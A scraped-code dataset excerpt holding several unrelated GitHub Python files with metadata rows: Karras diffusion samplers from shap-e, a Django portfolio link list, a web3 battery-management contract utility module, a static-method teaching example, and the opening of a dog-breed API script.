    on the fly).  ``sampler`` selects "heun", "dpm" or "ancestral".  When
    ``guidance_scale`` is neither 0 nor 1, classifier-free guidance is applied
    by doubling the batch (cond + uncond halves).
    """
    sigmas = get_sigmas_karras(steps, sigma_min, sigma_max, rho, device=device)
    # Start from pure noise scaled to the largest sigma.
    x_T = th.randn(*shape, device=device) * sigma_max
    sample_fn = {"heun": sample_heun, "dpm": sample_dpm, "ancestral": sample_euler_ancestral}[
        sampler
    ]
    # Only the deterministic samplers take the churn/noise knobs.
    if sampler != "ancestral":
        sampler_args = dict(s_churn=s_churn, s_tmin=s_tmin, s_tmax=s_tmax, s_noise=s_noise)
    else:
        sampler_args = {}
    if isinstance(diffusion, KarrasDenoiser):
        def denoiser(x_t, sigma):
            _, denoised = diffusion.denoise(model, x_t, sigma, **model_kwargs)
            if clip_denoised:
                denoised = denoised.clamp(-1, 1)
            return denoised
    elif isinstance(diffusion, GaussianDiffusion):
        # Wrap the timestep-based model so it speaks the sigma-based API.
        model = GaussianToKarrasDenoiser(model, diffusion)
        def denoiser(x_t, sigma):
            _, denoised = model.denoise(
                x_t, sigma, clip_denoised=clip_denoised, model_kwargs=model_kwargs
            )
            return denoised
    else:
        raise NotImplementedError
    if guidance_scale != 0 and guidance_scale != 1:
        # Classifier-free guidance: run cond/uncond in one doubled batch and
        # extrapolate from the unconditional prediction.
        def guided_denoiser(x_t, sigma):
            x_t = th.cat([x_t, x_t], dim=0)
            sigma = th.cat([sigma, sigma], dim=0)
            x_0 = denoiser(x_t, sigma)
            cond_x_0, uncond_x_0 = th.split(x_0, len(x_0) // 2, dim=0)
            x_0 = uncond_x_0 + guidance_scale * (cond_x_0 - uncond_x_0)
            return x_0
    else:
        guided_denoiser = denoiser
    for obj in sample_fn(
        guided_denoiser,
        x_T,
        sigmas,
        progress=progress,
        **sampler_args,
    ):
        if isinstance(diffusion, GaussianDiffusion):
            yield diffusion.unscale_out_dict(obj)
        else:
            yield obj
def get_sigmas_karras(n, sigma_min, sigma_max, rho=7.0, device="cpu"):
    """Constructs the noise schedule of Karras et al. (2022).

    Interpolates linearly in sigma^(1/rho) space from sigma_max down to
    sigma_min, then appends a final zero sigma.
    """
    min_inv_rho = sigma_min ** (1 / rho)
    max_inv_rho = sigma_max ** (1 / rho)
    ramp = th.linspace(0, 1, n)
    sigmas = (max_inv_rho + ramp * (min_inv_rho - max_inv_rho)) ** rho
    return append_zero(sigmas).to(device)
def to_d(x, sigma, denoised):
    """Converts a denoiser output to a Karras ODE derivative."""
    sigma_broadcast = append_dims(sigma, x.ndim)
    return (x - denoised) / sigma_broadcast
def get_ancestral_step(sigma_from, sigma_to):
    """Calculates the noise level (sigma_down) to step down to and the amount
    of noise to add (sigma_up) when doing an ancestral sampling step."""
    from_var = sigma_from**2
    to_var = sigma_to**2
    sigma_up = (to_var * (from_var - to_var) / from_var) ** 0.5
    sigma_down = (to_var - sigma_up**2) ** 0.5
    return sigma_down, sigma_up
@th.no_grad()
def sample_euler_ancestral(model, x, sigmas, progress=False):
    """Ancestral sampling with Euler method steps.

    Yields one dict per step with the current sample ("x") and x0 prediction
    ("pred_xstart"), followed by a final dict holding the finished sample.
    """
    # Per-sample sigma multiplier (sigmas are scalars, x is batched).
    s_in = x.new_ones([x.shape[0]])
    indices = range(len(sigmas) - 1)
    if progress:
        from tqdm.auto import tqdm
        indices = tqdm(indices)
    for i in indices:
        denoised = model(x, sigmas[i] * s_in)
        # Split the sigma step into a deterministic part and fresh noise.
        sigma_down, sigma_up = get_ancestral_step(sigmas[i], sigmas[i + 1])
        yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigmas[i], "pred_xstart": denoised}
        d = to_d(x, sigmas[i], denoised)
        # Euler method
        dt = sigma_down - sigmas[i]
        x = x + d * dt
        # Re-inject noise to reach the target sigma (the "ancestral" part).
        x = x + th.randn_like(x) * sigma_up
    yield {"x": x, "pred_xstart": x}
@th.no_grad()
def sample_heun(
    denoiser,
    x,
    sigmas,
    progress=False,
    s_churn=0.0,
    s_tmin=0.0,
    s_tmax=0.0 if False else float("inf"),  # noqa: E501 -- see NOTE below
    s_noise=1.0,
):
    """Implements Algorithm 2 (Heun steps) from Karras et al. (2022)."""
    s_in = x.new_ones([x.shape[0]])
    indices = range(len(sigmas) - 1)
    if progress:
        from tqdm.auto import tqdm
        indices = tqdm(indices)
    for i in indices:
        # Optional "churn": temporarily raise sigma (and add matching noise)
        # within the [s_tmin, s_tmax] band.
        gamma = (
            min(s_churn / (len(sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.0
        )
        eps = th.randn_like(x) * s_noise
        sigma_hat = sigmas[i] * (gamma + 1)
        if gamma > 0:
            x = x + eps * (sigma_hat**2 - sigmas[i] ** 2) ** 0.5
        denoised = denoiser(x, sigma_hat * s_in)
        d = to_d(x, sigma_hat, denoised)
        yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigma_hat, "pred_xstart": denoised}
        dt = sigmas[i + 1] - sigma_hat
        if sigmas[i + 1] == 0:
            # Euler method
            x = x + d * dt
        else:
            # Heun's method
            x_2 = x + d * dt
            denoised_2 = denoiser(x_2, sigmas[i + 1] * s_in)
            d_2 = to_d(x_2, sigmas[i + 1], denoised_2)
            d_prime = (d + d_2) / 2
            x = x + d_prime * dt
    yield {"x": x, "pred_xstart": denoised}
@th.no_grad()
def sample_dpm(
    denoiser,
    x,
    sigmas,
    progress=False,
    s_churn=0.0,
    s_tmin=0.0,
    s_tmax=float("inf"),
    s_noise=1.0,
):
    """A sampler inspired by DPM-Solver-2 and Algorithm 2 from Karras et al. (2022)."""
    s_in = x.new_ones([x.shape[0]])
    indices = range(len(sigmas) - 1)
    if progress:
        from tqdm.auto import tqdm
        indices = tqdm(indices)
    for i in indices:
        # Same churn mechanism as sample_heun: optionally raise sigma and
        # add matching noise within the [s_tmin, s_tmax] band.
        gamma = (
            min(s_churn / (len(sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.0
        )
        eps = th.randn_like(x) * s_noise
        sigma_hat = sigmas[i] * (gamma + 1)
        if gamma > 0:
            x = x + eps * (sigma_hat**2 - sigmas[i] ** 2) ** 0.5
        denoised = denoiser(x, sigma_hat * s_in)
        d = to_d(x, sigma_hat, denoised)
        # NOTE(review): this intermediate yield uses the key "denoised"
        # whereas sample_heun/sample_euler_ancestral use "pred_xstart" --
        # confirm consumers do not rely on a uniform key here.
        yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigma_hat, "denoised": denoised}
        # Midpoint method, where the midpoint is chosen according to a rho=3 Karras schedule
        sigma_mid = ((sigma_hat ** (1 / 3) + sigmas[i + 1] ** (1 / 3)) / 2) ** 3
        dt_1 = sigma_mid - sigma_hat
        dt_2 = sigmas[i + 1] - sigma_hat
        x_2 = x + d * dt_1
        denoised_2 = denoiser(x_2, sigma_mid * s_in)
        d_2 = to_d(x_2, sigma_mid, denoised_2)
        x = x + d_2 * dt_2
    yield {"x": x, "pred_xstart": denoised}
def append_dims(x, target_dims):
    """Appends dimensions to the end of a tensor until it has target_dims dimensions."""
    missing = target_dims - x.ndim
    if missing < 0:
        raise ValueError(f"input has {x.ndim} dims but target_dims is {target_dims}, which is less")
    return x[(...,) + (None,) * missing]
def append_zero(x):
    """Return *x* with a single zero element appended along dim 0."""
    zero_tail = x.new_zeros([1])
    return th.cat([x, zero_tail])
| openai/shap-e | shap_e/diffusion/k_diffusion.py | k_diffusion.py | py | 9,973 | python | en | code | 10,619 | github-code | 36 | [
{
"api_name": "torch.randn_like",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "gaussian_diffusion.mean_flat",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "gaussian_diffusion.mean_flat",
"line_number": 38,
"usage_type": "call"
},
{
"api_na... |
38251884357 | from django.db import models
all_pages = []
# Just switched to keeping it in-memory. No real need for a model here.
# class Page(models.Model):
# top = models.TextField(blank=True, null=True)
# middle_link = models.TextField(blank=True, null=True)
# middle_html = models.TextField(blank=True, null=True)
# bottom = models.TextField(blank=True, null=True)
# year = models.CharField(max_length=200, blank=True, null=True)
# order = models.IntegerField(default=0)
# active = models.BooleanField(default=True)
# def __unicode__(self, *args, **kwargs):
# return self.top
class BaseModel(models.Model):
    # Abstract Django base that stamps every subclass row with a
    # last-modified timestamp.
    updated_at = models.DateTimeField(auto_now=True)
    class Meta:
        abstract = True
    def __unicode__(self):
        # NOTE(review): assumes subclasses define a `name` attribute --
        # BaseModel itself declares none, so this raises AttributeError
        # for subclasses without one.  Confirm all subclasses have `name`.
        return "%s" % self.name
class SimplePage:
    """Plain in-memory page record (replacement for the old Page model)."""

    def __init__(self, top="", middle_link="", middle_links=None, bottom="", year=""):
        """Store the display fields; *middle_links* is a list of link dicts."""
        self.top = top
        self.middle_link = middle_link
        self.middle_links = middle_links  # list of dicts - url, text
        self.bottom = bottom
        self.year = year

    def __unicode__(self, *args, **kwargs):
        """Human-readable label: the page's top line."""
        return self.top
def add_page(*args, **kwargs):
    """Register a page by appending a new SimplePage to the module list.

    All arguments are forwarded to the SimplePage constructor.
    """
    # `all_pages` is a module-level name and is directly in scope; the
    # previous globals()["all_pages"] lookup was a needless indirection.
    all_pages.append(SimplePage(*args, **kwargs))
add_page(
top="is enough",
bottom="what does love mean to you?",
middle_link="http://isenough.com",
year="2012 (in-progress)",
)
add_page(
top="encore",
bottom="a digital poem",
middle_link="http://www.encorepoem.com",
year="2012 (in-progress)",
)
add_page(
top="slow art",
bottom="the anti-museum.<br/>\r\nin portland, or",
middle_link="http://slowartpdx.com",
year="2011+",
)
# add_page(
# top="dear text messages,",
# bottom="spoken word",
# middle_link="",
# year="2012",
# )
add_page(
top="togetheralone",
bottom="an experiment in community",
middle_link="http://togetheralone.org",
year="2012 (in-progress)",
)
add_page(
top="the digital executioner",
bottom="viral web idea generator",
middle_link="http://www.thedigitalexecutioner.com",
year="2012",
)
add_page(
top="goodcloud",
bottom="helping small nonprofits succeed",
middle_link="https://www.agoodcloud.com",
year="2011",
)
add_page(
top="github",
bottom="where I keep the bits and bytes",
middle_link = "https://www.github.com/skoczen",
# middle_links=[
# {
# "url": "https://www.github.com/skoczen",
# "text": "Personal",
# "class": ""
# },
# {
# "url": "https://www.github.com/GoodCloud",
# "text": "GoodCloud",
# "class": ""
# }
# ],
year="2009+",
)
add_page(
top="sixlinks",
bottom="sustainability you can actually do",
middle_link="http://www.sixlinks.org",
year="2008+",
)
add_page(
top="the facebooks",
bottom="yep, I'm on there",
middle_link = "https://www.facebook.com/skoczen",
# middle_links=[
# {
# "url": "https://www.facebook.com/skoczen",
# "text": "f",
# "class": "facebook"
# },
# {
# "url": "https://twitter.com/#!/skoczen",
# "text": "t",
# "class": "twitter"
# },
# {
# "url": "https://plus.google.com/101690366177319310091/",
# "text": "g+",
# "class": "google_plus"
# }
# ],
year="2007+",
)
# add_page(
# top="Write Around Portland",
# bottom="I'm proud to be a volunteer and donor for this amazing organization.",
# middle_link="http://www.writearound.org",
# year="2009+",
# )
add_page(
top="30 people, 30 minutes",
bottom="an epic way to turn 30",
middle_link="http://www.30people30minutes.com",
year="1999+",
)
add_page(
top="quantum imagery",
bottom="ye olde sole proprietorship",
middle_link="http://www.quantumimagery.com",
year="1999+",
)
add_page(
top="photoblog",
bottom="ye olde photos",
middle_link="http://www.skoczen.net/photos",
year="2005",
)
add_page(
top="but i'm hungry!",
bottom="ye olde recipe and restaurant site",
middle_link="http://skoczen.net/food/",
year="1999+",
)
add_page(
top="liquid silver zen",
bottom="early experiments in design",
middle_link="http://liquidsilverzen.net/",
year="2002",
)
add_page(
top="or, just google",
bottom="It's all me. Except for the Ohio seatbelt ticket. That's the other Steven Skoczen. (Really.)",
middle_link="https://www.google.com/?q=Steven%20Skoczen",
year="1997+",
)
# add_page(
# top="birth",
# bottom="there was no internet then",
# middle_links=[
# {
# "url": "",
# "text": "whoa",
# "class": ""
# },
# ],
# year="1980",
# )
| skoczen/skoczen | project/apps/resume/models.py | models.py | py | 4,868 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "django.db.models.DateTimeField",
"line_number": 20,
"usage_type": "call"
},
{
"api_n... |
34761412830 | import sys, os
import subprocess
import json
from typing import Union
from random import random
import web3
from web3 import Web3
from web3._utils.threads import Timeout
from solcx import compile_files
from eth_utils import decode_hex
# Project modules
from TextColor.color import bcolors
MGMT_CONTRACT_DB_NAME = 'database.json'
MGMT_CONTRACT_SRC_PATH = r"./contracts/ManagementContract.sol"
MGMT_CONTRACT_NAME = "ManagementContract"
BATTERY_MGMT_CONTRACT_SRC_PATH = r"./contracts/BatteryManagement.sol"
BATTERY_MGMT_CONTRACT_NAME = "BatteryManagement"
REGISTRATION_REQUIRED_GAS = 50000
def _deploy_contract_and_wait(_w3: Web3, _actor: str, _contract_src_file: str, _contract_name: str, *args):
    """
    Deploy contract to the blockchain and wait for its inclusion in a block

    :param str _actor: The person transacting the contract
    :param str _contract_src_file: Path to contract source code
    :param str _contract_name: Contract name
    :param list args: Contract's constructor arguments
    :return: contract address
    :rtype: str
    """
    tx_hash = _deploy_contract(_w3, _actor, _contract_src_file, _contract_name, *args)
    # NOTE(review): calls the function through the *module* (`web3.eth`)
    # and passes the Web3 instance plus positional timeout/poll-latency --
    # confirm this matches the installed web3.py version's API (newer
    # versions expose it as `_w3.eth.wait_for_transaction_receipt(...)`).
    receipt = web3.eth.wait_for_transaction_receipt(_w3, tx_hash, 120, 0.1)
    return receipt["contractAddress"]
def _deploy_contract(_w3: Web3, _actor: str, _contract_src_file: str, _contract_name: str, *args):
    """
    Deploy a contract to the blockchain without waiting for inclusion.

    :param Web3 _w3: Web3 instance
    :param str _actor: The person transacting the contract
    :param str _contract_src_file: Path to contract source code
    :param str _contract_name: Contract name
    :param list args: Contract's constructor arguments
    :return: transaction hash of the deployment transaction
    """
    compiled = compile_contracts(_contract_src_file)
    factory = initialize_contract_factory(
        _w3, compiled, _contract_src_file + ":" + _contract_name
    )
    tx_params = {'from': _actor, 'gasPrice': get_actual_gas_price(_w3)}
    return factory.constructor(*args).transact(transaction=tx_params)
def _wait_for_validation(_w3: Web3, _tx_dict: dict, _tmout: int = 120) -> dict:
    """
    Wait for a batch of transactions to be included in blocks.

    :params Web3 _w3: Web3 instance
    :params dict _tx_dict: Mapping of label -> transaction hash
    :params int _tmout: Timeout for inclusion in seconds (raises on expiry)
    :return: Mapping of label -> [tx hash, receipt]
    :rtype: dict
    """
    receipts_list = {}
    for i in _tx_dict.keys():
        # Pair each tx hash with a placeholder for its future receipt.
        receipts_list[i] = [_tx_dict[i], None]
    confirmations = len(list(_tx_dict))
    # Poll until every transaction has a receipt or the Timeout expires.
    with Timeout(_tmout) as tm:
        while(confirmations > 0):
            for i in _tx_dict.keys():
                if receipts_list[i][1] is None:
                    tx_reciept = _w3.eth.getTransactionReceipt(receipts_list[i][0])
                    if tx_reciept is not None:
                        receipts_list[i][1] = tx_reciept
                        confirmations -= 1
            # Randomized sleep (< 1s) to avoid a tight polling loop.
            tm.sleep(random())
    return receipts_list
def _create_mgmt_contract_db(_contract_address: str) -> None:
    """
    Persist the management contract's blockchain address into the local
    JSON database file.

    :params str _contract_address: Management contract address in blockchain
    :return: Nothing
    :rtype: None
    """
    write_data_base({'mgmt_contract': _contract_address}, MGMT_CONTRACT_DB_NAME)
def get_actual_gas_price(_w3: Web3) -> float:
    """
    Get the gas price used for transactions.

    NOTE(review): despite the name, this returns a fixed 1 gwei (in wei)
    rather than querying the network -- confirm this is intended.

    :param Web3 _w3: Web3 instance
    :return: Gas price in wei
    :rtype: float
    """
    return _w3.toWei(1, 'gwei')
def write_data_base(_data: dict, _file_name: str) -> None:
    """
    Serialize *_data* as JSON into *_file_name*, overwriting any existing
    content.

    :param dict _data: Data to write
    :param str _file_name: Name of the file for writing
    :return: Nothing
    :rtype: None
    """
    with open(_file_name, 'w') as handle:
        json.dump(_data, handle)
def unlock_account(_w3: Web3, _account: str, _password: str) -> None:
    """
    Unlock *_account* on the node for 300 seconds so it can sign
    transactions.

    :param Web3 _w3: Web3 instance
    :param str _account: Account to unlock
    :param str _password: Password for the account
    :return: Nothing
    :rtype: None
    """
    unlock_duration_seconds = 300
    _w3.geth.personal.unlockAccount(_account, _password, unlock_duration_seconds)
def create_new_account(_w3: Web3, _password: str, _file_name: str) -> str:
    """
    Create a new node account, persist its credentials, and return a
    colorized account-address string.  Any pre-existing database file is
    replaced.

    :param Web3 _w3: Web3 instance
    :param str _password: Password for the new account
    :param str _file_name: Name of the database file for writing
    :return: Account address in blockchain (with terminal color codes)
    :rtype: str
    """
    if os.path.exists(_file_name):
        os.remove(_file_name)
    record = {"account": _w3.geth.personal.newAccount(_password), "password": _password}
    write_data_base(record, _file_name)
    return f"{bcolors.HEADER}{record['account']}{bcolors.ENDC}"
def open_data_base(_file_name: str) -> Union[dict, None]:
    """
    Load and return JSON data from *_file_name*.

    :param str _file_name: Database file name
    :return: None if the file does not exist, otherwise the parsed data
    :rtype: None/dict
    """
    if not os.path.exists(_file_name):
        return None
    with open(_file_name) as handle:
        return json.load(handle)
def compile_contracts(_files: Union[str, list]):
    """
    Compile contract file/files.

    :param str/list _files: Files to compile
    :return: Compiled contracts
    :rtype: dict
    :raises TypeError: if *_files* is neither a str nor a list
    """
    if isinstance(_files, str):
        return compile_files([_files])
    if isinstance(_files, list):
        return compile_files(_files)
    # Previously any other input type fell through and raised a confusing
    # UnboundLocalError on `contracts`; fail fast with a clear message.
    raise TypeError(f"_files must be str or list, got {type(_files).__name__}")
def get_data_from_db(_file_name: str,_key: str) -> Union[str, None]:
    """
    Fetch a single value from a JSON database file.

    :params str _file_name: Name of the database file
    :params str _key: Key of dictionary
    :return: None if the database cannot be read, otherwise the stored value
    :rtype: None/str
    """
    data = open_data_base(_file_name)
    if data is not None:
        return data[_key]
    print("Cannot access account database")
    return None
def init_management_contract(_w3: Web3):
    """
    Build a contract object bound to the deployed management contract.

    :param Web3 _w3: Web3 instance
    :return: Management contract
    :rtype: Contract instance
    """
    compiled = compile_contracts(MGMT_CONTRACT_SRC_PATH)
    contract_key = MGMT_CONTRACT_SRC_PATH + ":" + MGMT_CONTRACT_NAME
    deployed_address = open_data_base(MGMT_CONTRACT_DB_NAME)["mgmt_contract"]
    return initialize_contract_factory(_w3, compiled, contract_key, deployed_address)
def initialize_contract_factory(_w3: Web3, _compiled_contracts, _key: str, _address: str = None):
    """
    Build a contract object from compiled output.

    Without *_address* a deployable factory (abi + bytecode) is returned;
    with *_address* the object is bound to an already-deployed contract.

    :params Web3 _w3: Web3 instance
    :params _compiled_contracts: Compiled contracts
    :params str _key: Contract path + name
    :params str _address: Target address
    :return: Contract instance
    :rtype: Contract
    """
    abi = _compiled_contracts[_key]['abi']
    if _address is None:
        return _w3.eth.contract(abi=abi, bytecode=_compiled_contracts[_key]['bin'])
    return _w3.eth.contract(abi=abi, address=_address)
def get_battery_managment_contract_addr(_w3: Web3) -> str:
    """
    Look up the battery management contract address via the management
    contract; exits the program with a colored "Failed" message on error.

    :params Web3 _w3: Web3 instance
    :return: Contract's address
    :rtype: str
    """
    try:
        mgmt_contract = init_management_contract(_w3)
        addr = mgmt_contract.functions.getBatteryManagmentAddr().call()
    except Exception:
        # Bug fix: the previous bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; catch only genuine errors before aborting.
        sys.exit(f"{bcolors.FAIL}Failed{bcolors.ENDC}")
    return addr
def init_battery_management_contract(_w3: Web3, addr: str):
    """
    Build a contract object bound to the deployed battery management
    contract.

    :param Web3 _w3: Web3 instance
    :param str addr: Battery management contract's address
    :return: Battery management contract
    :rtype: Contract instance
    """
    compiled = compile_contracts(BATTERY_MGMT_CONTRACT_SRC_PATH)
    contract_key = BATTERY_MGMT_CONTRACT_SRC_PATH + ":" + BATTERY_MGMT_CONTRACT_NAME
    return initialize_contract_factory(_w3, compiled, contract_key, addr)
def create_script_from_tmpl(private_key, address: str):
    """Generate a battery firmware script from the local template.

    Line 12 of ``batteryTemplate.py`` is replaced with the private-key
    assignment and the result is written to ``firmware/<addr[2:10]>.py``.
    """
    with open("batteryTemplate.py", 'r') as tmpl:
        template_lines = tmpl.readlines()
    template_lines[11] = f"private_key = '{private_key}'\n"
    with open(f"firmware/{address[2:10]}.py", 'w') as fw:
        fw.writelines(template_lines)
def get_battery_info(_path: str) -> dict:
    """
    Run a battery firmware script and load the info it dumps
    (v, r, s, charges, time).  Exits the program if the firmware file
    does not exist.

    :param str _path: Path to battery's firmware
    :return: Battery's info
    :rtype: dict
    """
    if not os.path.exists(f"{_path}"):
        sys.exit(f"{bcolors.FAIL}Battery does not exist{bcolors.ENDC}")
    subprocess.run(["python", f"{_path}", "--get"])
    return open_data_base(f"{_path[:-3]}_data.json")
def verify_battery(_w3: Web3, _path: str):
    """
    Verify a battery firmware's signature against the battery management
    contract and resolve its vendor.

    :param Web3 _w3: Web3 instance
    :param str _path: Path to firmware
    :return: (verified flag, charge count, vendor id hex, vendor name)
    :rtype: tuple
    """
    verified = False
    battery_info = get_battery_info(_path)
    if battery_info is None:
        sys.exit(f"{bcolors.FAIL}The battery does not exist{bcolors.ENDC}")
    battery_mgmt_addr = get_battery_managment_contract_addr(_w3)
    battery_mgmt_contract = init_battery_management_contract(_w3, battery_mgmt_addr)
    # Check the ECDSA signature (v, r, s) over (charges, time) on-chain and
    # recover the vendor address that signed the firmware.
    verified, vendor_address = battery_mgmt_contract.functions.verifyBattery(battery_info['v'], _w3.toBytes(hexstr=battery_info['r']),
                                                                             _w3.toBytes(hexstr=battery_info['s']), battery_info['charges'],
                                                                             battery_info['time']).call()
    # Resolve the vendor's registered id and display name.
    mgmt_contract = init_management_contract(_w3)
    vendor_id = _w3.toHex(mgmt_contract.functions.vendorId(vendor_address).call())
    vendor_name = (mgmt_contract.functions.vendorNames(vendor_id).call()).decode()
    return verified, battery_info['charges'], vendor_id, vendor_name
def change_owner(_w3: Web3, _battery_id: str, _new_owner: str, account_db_name: str) -> str:
    """
    Change the owner of battery

    :param Web3 _w3: Web3 instance
    :param str _battery_id: battery ID (hex string)
    :param str _new_owner: New owner address
    :param str account_db_name: JSON file holding the acting account/password
    :return: Status message
    :rtype: str
    """
    data = open_data_base(account_db_name)
    actor = data['account']
    # Gas limit sized for a 2204-byte payload at 68 gas/byte plus base cost.
    tx = {'from': actor, 'gasPrice': get_actual_gas_price(_w3), 'gas':2204 * 68 + 21000}
    battery_mgmt_contract_addr = get_battery_managment_contract_addr(_w3)
    battery_mgmt_contract = init_battery_management_contract(_w3, battery_mgmt_contract_addr)
    unlock_account(_w3, actor, data['password'])
    tx_hash = battery_mgmt_contract.functions.transfer(_new_owner, decode_hex(_battery_id)).transact(tx)
    # NOTE(review): module-level `web3.eth.wait_for_transaction_receipt(_w3, ...)`
    # call -- confirm against the installed web3.py version's API (newer
    # versions expose this as `_w3.eth.wait_for_transaction_receipt(...)`).
    receipt = web3.eth.wait_for_transaction_receipt(_w3, tx_hash, 120, 0.1)
    result = receipt.status
    # status == 1 means the transaction succeeded on-chain.
    if result == 1:
        return "Ownership change was successfull"
    else:
        return "Ownership change failed"
| acid9reen/bas | utils.py | utils.py | py | 11,123 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "web3.Web3",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "web3.eth.wait_for_transaction_receipt",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "web3.eth",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "web3.We... |
34234807737 |
class Employee:
    """Toy employee record demonstrating regular, class and static methods."""

    raise_amount = 1.04  # default multiplier used by apply_raise
    num_emps = 0         # running count of instances ever created

    def __init__(self, first, last, pay):
        """Store the name/pay and derive the company e-mail address."""
        self.first = first
        self.last = last
        self.pay = pay
        self.email = first + '.' + last + '@company.com'
        Employee.num_emps += 1

    def fullname(self):
        """Return "First Last"."""
        return f"{self.first} {self.last}"

    def apply_raise(self):
        """Apply the (class- or instance-level) raise multiplier to pay."""
        self.pay = int(self.pay * self.raise_amount)

    @classmethod
    def set_raise_amount(cls, amount):
        """Change the raise multiplier on the class (affects all instances)."""
        cls.raise_amount = amount

    @classmethod
    def from_string(cls, emp_str):
        """Alternate constructor: parse a "first-last-pay" string.

        Bug fix: pay is converted to int so that apply_raise works on
        employees built from strings (previously pay stayed a str and
        str * float raised TypeError).
        """
        first, last, pay = emp_str.split('-')
        return cls(first, last, int(pay))

    # Regular methods pass the instance ('self') as the first argument.
    # Class methods pass the class ('cls').  Static methods pass nothing
    # automatically: they behave like plain functions but keep a logical
    # connection to the class.  Use a static method when the code neither
    # creates an instance nor touches instance/class state.

    @staticmethod
    def is_workday(day):
        """Return True if *day* (a datetime.date) falls on Mon-Fri.

        In Python, weekday() indexes days 0-6 for Mon-Sun, so 5 and 6
        are the weekend.
        """
        return day.weekday() not in (5, 6)
# Demo: create two employees and check a date against the workday helper.
emp_1 = Employee("Corey", "Schafer", 50000)
emp_2 = Employee("Test", "User", 60000)
import datetime
my_date = datetime.date(2016, 7, 10) #prints false as it is a Sunday
print(Employee.is_workday(my_date))
| latiful-hassan/OOP | staticmethods.py | staticmethods.py | py | 1,980 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date",
"line_number": 57,
"usage_type": "call"
}
] |
34619647140 | import datetime
import json
import random
import requests
import numpy as np
import pandas as pd
from pkg_resources import resource_filename
class DataWrangler:
    """Aggregate raw wallet records into a summary table and plot-ready data.

    *wallet* is a list of per-currency, per-date records containing at least
    the keys used below (currency, effectiveDate, outcome, profit, pct_change,
    plus the dropped no/mid columns).
    """

    def __init__(self, wallet, start, end):
        self.wallet = wallet
        self.start = start
        self.end = end
        self.profit = None        # total profit; filled by get_summary()
        self.summary = None       # per-currency summary frame
        self.dataviz_data = None  # currency x date matrix of pct changes

    def get_summary(self):
        """Build the per-currency summary for the final date and total profit."""
        frame = pd.DataFrame(self.wallet)
        final = frame[frame['effectiveDate'] == self.end].copy(deep=True)
        # Share of the total outcome held in each currency, in percent.
        final['final_pct_of_total'] = round(
            (final['outcome'] / sum(final['outcome'])) * 100, 2)
        final = final.drop(columns=['no', 'mid', 'effectiveDate'])
        final = final.set_index('currency')
        self.profit = round(sum(final['profit']), 2)
        self.summary = final

    def get_dataviz_data(self):
        """Pivot the wallet into a currency-by-date table of pct changes."""
        frame = pd.DataFrame(self.wallet).rename(columns={'effectiveDate': 'date'})
        self.dataviz_data = frame.pivot(index='currency', columns='date',
                                        values='pct_change')
class RandomCurrencies:
    """Generate a random portfolio: currency codes with percent weights
    that sum to exactly 100."""

    def __init__(self, num):
        self.num = num  # validated by the property setter below
        self._codes = set(load_currencies().keys())

    @property
    def num(self):
        return self._num

    @num.setter
    def num(self, value):
        if not 0 < value <= 35:
            raise ValueError('Number of currencies must be between 1 and 35')
        self._num = value

    def _country_codes(self):
        """Generate random country codes"""
        # BUG FIX: random.sample() rejects sets (deprecated in 3.9,
        # TypeError since Python 3.11) — sample from a sorted list instead.
        return random.sample(sorted(self._codes), self.num)

    def _pct_values(self):
        """Generate random pct values that add up to 100"""
        nums = np.random.random(self.num)
        nums = [round(n / sum(nums) * 100) for n in nums]
        # Rounding may yield zeros or a sum != 100; retry until valid.
        if 0 in nums or sum(nums) != 100:
            return self._pct_values()
        return nums

    def generate(self):
        """Return currency & percent value pairs (max 35)"""
        return [(code, pct_value) for code, pct_value
                in zip(self._country_codes(), self._pct_values())]
def first_possible_date():
    """Return the earliest queryable date (29 days ago) as 'YYYY-MM-DD'."""
    earliest = datetime.date.today() - datetime.timedelta(days=29)
    return earliest.isoformat()
def load_currencies():
    """Load the bundled currency table and map ISO code -> currency name."""
    path = resource_filename('currency_wallet.utils', 'data/currencies.json')
    with open(path, 'r') as fp:
        payload = json.load(fp)
    # NBP payload shape: a one-element list whose 'rates' holds the table.
    return {entry['code']: entry['currency'] for entry in payload[0]['rates']}
def query_nbp_api(currency, start, end):
    """Get exchange rates from NBP api.

    Returns the decoded JSON payload, or None when the request fails
    (network error, timeout, or non-2xx response).
    """
    adapter = requests.adapters.HTTPAdapter(max_retries=2)
    session = requests.Session()
    session.mount('http://api.nbp.pl/', adapter)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)\
        AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
    }
    url = f'http://api.nbp.pl/api/exchangerates/rates/a/{currency}/{start}/{end}/?format=json'
    # BUG FIX: previously `result` was only bound inside the try, so a failed
    # request reached `return result` and raised NameError.
    result = None
    try:
        response = session.get(url, headers=headers, timeout=3)
        response.raise_for_status()
        result = response.json()
    except Exception as e:
        print(e)
    return result
| karolow/currency-wallet | currency_wallet/utils/utils.py | utils.py | py | 3,114 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.random.random",... |
39723292841 | #Find list of all sub_breed breed name
import requests
def get_json_dog_output_dict(url):
    """Fetch *url* over HTTP and return the decoded JSON body as a dict."""
    response = requests.get(url)
    return response.json()
def get_breed_sub_breed_full_name():
    """Print every dog breed; sub-breeds are printed as '<sub_breed>-<breed>'."""
    dog_output = get_json_dog_output_dict(url = "https://dog.ceo/api/breeds/list/all")
    breeds = dog_output["message"]
